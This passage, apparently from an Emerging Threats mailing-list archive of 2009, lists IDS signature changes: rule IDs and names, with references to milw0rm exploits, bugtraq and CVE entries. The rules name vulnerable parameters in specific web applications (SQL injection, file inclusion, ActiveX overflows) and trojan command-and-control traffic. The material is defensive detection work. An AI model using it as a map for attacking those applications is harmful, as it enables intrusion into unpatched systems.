url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Fri Aug 14 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 14 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090814200012.C91054504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri Aug 14 16:00:12 2009 [***] [+++] Added rules: [+++] 2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules) [///] Modified active rules: [///] 2001239 - ET POLICY Cisco Device in Config Mode (emerging-policy.rules) 2001240 - ET POLICY Cisco Device New Config Built (emerging-policy.rules) 2002801 - ET POLICY Google Desktop User-Agent Detected (emerging-policy.rules) 2002838 - ET POLICY Google Search Appliance browsing the Internet (emerging-policy.rules) 2003634 - ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan (emerging-scan.rules) 2009711 - ET TROJAN Win32.Runner (Often Rootkit) - POST (emerging-virus.rules) 2009712 - ET MALWARE Adware PlusDream - GET Config Download/Update (emerging-malware.rules) 2009713 - ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected (emerging.rules) 2009714 - ET WEB Script tag in URI, Possible Cross Site Scripting Attempt (emerging-web.rules) 2009715 - ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt (emerging-web.rules) 2009716 - ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection (emerging-web_sql_injection.rules) 2009717 - ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009718 - ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009719 - ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion (emerging-web_sql_injection.rules) 2009720 - ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion (emerging-web_sql_injection.rules) 2009723 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009724 - ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009725 - ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow (emerging-web.rules) 2009726 - ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009727 - ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection (emerging-web_sql_injection.rules) 2009728 - ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009729 - ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009730 - ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection (emerging-web_sql_injection.rules) 2009731 - ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009733 - ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009734 - ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009735 - ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow (emerging-web.rules) 2009736 - ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal (emerging-web_sql_injection.rules) 2009737 - ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete (emerging-web_sql_injection.rules) 2009738 - ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection (emerging-web_sql_injection.rules) 2009739 - ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009740 - ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection (emerging-web_sql_injection.rules) 2009741 - ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection (emerging-web_sql_injection.rules) 2009742 - ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection (emerging-web_sql_injection.rules) 2009743 - ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009744 - ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection (emerging-web_sql_injection.rules) 2009745 - ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009746 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009747 - ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection (emerging-web_sql_injection.rules) 2009748 - ET WEB Possible Wordpress Administrative Password Reset Vulnerability (emerging-web.rules) 2009749 - ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan (emerging-scan.rules) [---] Removed rules: [---] 2002849 - ET POLICY Google Appliance External Proxy Stylesheet (emerging-policy.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (42): 2001239 || ET POLICY Cisco Device in Config Mode || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001239 2001240 || ET POLICY Cisco Device New Config Built || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001240 2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003634 || ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Get-minimal_UA || url,doc.emergingthreats.net/2003634 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Runner || url,doc.emergingthreats.net/2009711 || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_PlusDream || url,doc.emergingthreats.net/2009712 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Dozer || url,doc.emergingthreats.net/2009713 || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_CSS || url,doc.emergingthreats.net/2009714 || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_CSS || url,doc.emergingthreats.net/2009715 || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ECShop || url,doc.emergingthreats.net/2009716 || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_1024CMS || url,doc.emergingthreats.net/2009717 || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_AvailScript || url,doc.emergingthreats.net/2009718 || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_pHNews || url,doc.emergingthreats.net/2009719 || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_pHNews || url,doc.emergingthreats.net/2009720 || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009723 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009724 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Roxio || url,doc.emergingthreats.net/2009725 || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_TotalCalendar || url,doc.emergingthreats.net/2009726 || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ScriptsforSites || url,doc.emergingthreats.net/2009727 || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NotFTP || url,doc.emergingthreats.net/2009728 || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_TotalCalendar || url,doc.emergingthreats.net/2009729 || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_JobHunt || url,doc.emergingthreats.net/2009730 || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_VSPanel || url,doc.emergingthreats.net/2009731 || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Golabi || url,doc.emergingthreats.net/2009733 || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_212Board || url,doc.emergingthreats.net/2009734 || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Roxio || url,doc.emergingthreats.net/2009735 || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ProjectCMS || url,doc.emergingthreats.net/2009736 || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ProjectCMS || url,doc.emergingthreats.net/2009737 || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_XBLC || url,doc.emergingthreats.net/2009738 || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DMXReady || url,doc.emergingthreats.net/2009739 || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009740 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009741 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009742 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHPDating || url,doc.emergingthreats.net/2009743 || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_SuperNews || url,doc.emergingthreats.net/2009744 || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Flatchat || url,doc.emergingthreats.net/2009745 || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009746 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_AvailScript || url,doc.emergingthreats.net/2009747 || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Wordpress || url,doc.emergingthreats.net/2009748 || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_403 || url,doc.emergingthreats.net/2009749 || url,www.checkupdown.com/status/E403.html -> Added to emerging-sid-msg.map.txt (42): 2001239 || ET POLICY Cisco Device in Config Mode || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001239 2001240 || ET POLICY Cisco Device New Config Built || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001240 2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003634 || ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Get-minimal_UA || url,doc.emergingthreats.net/2003634 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Runner || url,doc.emergingthreats.net/2009711 || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_PlusDream || url,doc.emergingthreats.net/2009712 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Dozer || url,doc.emergingthreats.net/2009713 || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_CSS || url,doc.emergingthreats.net/2009714 || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_CSS || url,doc.emergingthreats.net/2009715 || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ECShop || url,doc.emergingthreats.net/2009716 || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_1024CMS || url,doc.emergingthreats.net/2009717 || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_AvailScript || url,doc.emergingthreats.net/2009718 || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_pHNews || url,doc.emergingthreats.net/2009719 || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_pHNews || url,doc.emergingthreats.net/2009720 || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009723 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009724 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Roxio || url,doc.emergingthreats.net/2009725 || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_TotalCalendar || url,doc.emergingthreats.net/2009726 || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ScriptsforSites || url,doc.emergingthreats.net/2009727 || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NotFTP || url,doc.emergingthreats.net/2009728 || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_TotalCalendar || url,doc.emergingthreats.net/2009729 || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_JobHunt || url,doc.emergingthreats.net/2009730 || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_VSPanel || url,doc.emergingthreats.net/2009731 || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Golabi || url,doc.emergingthreats.net/2009733 || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_212Board || url,doc.emergingthreats.net/2009734 || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Roxio || url,doc.emergingthreats.net/2009735 || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ProjectCMS || url,doc.emergingthreats.net/2009736 || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ProjectCMS || url,doc.emergingthreats.net/2009737 || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_XBLC || url,doc.emergingthreats.net/2009738 || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DMXReady || url,doc.emergingthreats.net/2009739 || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || 